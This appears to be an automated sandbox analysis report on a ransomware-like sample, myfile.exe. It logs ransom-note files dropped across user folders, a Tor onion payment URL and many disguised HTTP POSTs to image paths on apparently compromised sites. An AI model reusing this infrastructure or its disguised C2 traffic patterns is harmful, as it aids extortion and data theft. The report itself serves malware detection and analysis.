Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\favorites\links\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\pictures\camera roll\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\pictures\saved pictures\g165067x37-readme.txt	Jump to behavior

Source: unknown	HTTPS traffic detected: 35.215.83.253:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 160.153.0.131:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.58.213.84:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.108.65.79:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.160.0.18:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.40.30.106:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.61.68:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.116.147.189:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.73.140.70:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.73.140.70:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.71.217:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.120:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.118.122.41:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.118.122.41:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.15.159.75:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 160.153.0.174:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.130.22.108:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.158.62:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 134.209.129.254:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.215.137.200:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.215.137.200:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.92.72.56:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.236.62.147:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.140.71:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.246.227.29:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.68.16.21:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.95.251.157:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.166.193:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.166.193:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 109.237.132.56:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.158.2.41:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.211.239:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.15.78.186:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.15.78.186:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.145:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.215.226.251:443 -> 192.168.2.4:49778 version: TLS 1.2

Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\~ source: myfile.exe, 00000000.00000003.2024747087.0000000004343000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: myfile.exe, 00000000.00000003.2018769602.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2024670998.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2020421518.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\myfile.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: c:	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00276299 FindFirstFileW,FindNextFileW,FindClose,

0_2_00276299

Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.19041.1865_en-us_b6d4cf229ed6dfa6.manifest	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3_hidserv.dll.mui_561adfc8	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..keyhelper.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9723a608a71b1eb.manifest	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifest	Jump to behavior

Networking

Found Tor onion address

Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
Source: myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
Source: myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
Source: myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt37.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt16.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt29.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt4.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt56.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt23.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt61.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt45.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt62.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt32.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt41.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt27.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt31.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt22.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt21.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt54.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt50.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt15.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt9.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt0.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt28.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt25.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt60.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt3.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt39.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt38.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt2.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt44.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt52.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt20.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt26.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt36.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt5.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt34.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt18.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt51.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt33.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt35.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt19.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt55.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt1.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt42.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt43.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt57.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt11.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt7.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt24.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt8.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt30.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt47.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt46.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt58.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt40.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt13.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt48.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt6.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt53.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt10.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt14.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt49.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt59.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt17.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: g165067x37-readme.txt12.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061

Posts data to a JPG file (protocol mismatch)

Source: unknown

HTTP traffic detected: POST /wp-content/assets/iybw.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: rsidesigns.com

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: bd2fly.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wribrazil.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: 90nguyentuan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: satoblog.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: funworx.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: activeterroristwarningcompany.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ikadomus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: enactusnhlstenden.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: baikalflot.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chomiksy.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: davedavisphotos.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: avisioninthedesert.com replaycode: Name error (3)

Source: unknown

Network traffic detected: DNS query count 54

Source: unknown

Network traffic detected: IP country count 11

Source: Joe Sandbox View	IP Address: 192.0.78.13 192.0.78.13
Source: Joe Sandbox View	IP Address: 198.185.159.145 198.185.159.145
Source: Joe Sandbox View	IP Address: 198.185.159.145 198.185.159.145

Source: Joe Sandbox View	ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View	ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View	ASN Name: INETWIRE-ASWilhelm-Wagenfeld-Str16DE INETWIRE-ASWilhelm-Wagenfeld-Str16DE

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /admin/temp/eghuey.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: parksideseniorliving.net
Source: global traffic	HTTP traffic detected: POST /admin/images/ff.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: lashandbrowenvy.com
Source: global traffic	HTTP traffic detected: POST /wp-content/assets/iybw.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: rsidesigns.com
Source: global traffic	HTTP traffic detected: POST /wp-content/assets/umjrglicgx.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: pansionatblago.ru
Source: global traffic	HTTP traffic detected: POST /static/temp/mdjsvnauuvkc.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: magrinya.net
Source: global traffic	HTTP traffic detected: POST /news/graphic/yooacevq.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: business-basic.de
Source: global traffic	HTTP traffic detected: POST /uploads/assets/xwncifkynx.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: afbudsrejserallinclusive.dk
Source: global traffic	HTTP traffic detected: POST /news/pics/sovuwxryinfm.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: m2graph.fr
Source: global traffic	HTTP traffic detected: POST /content/images/gv.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: stanleyqualitysystems.com
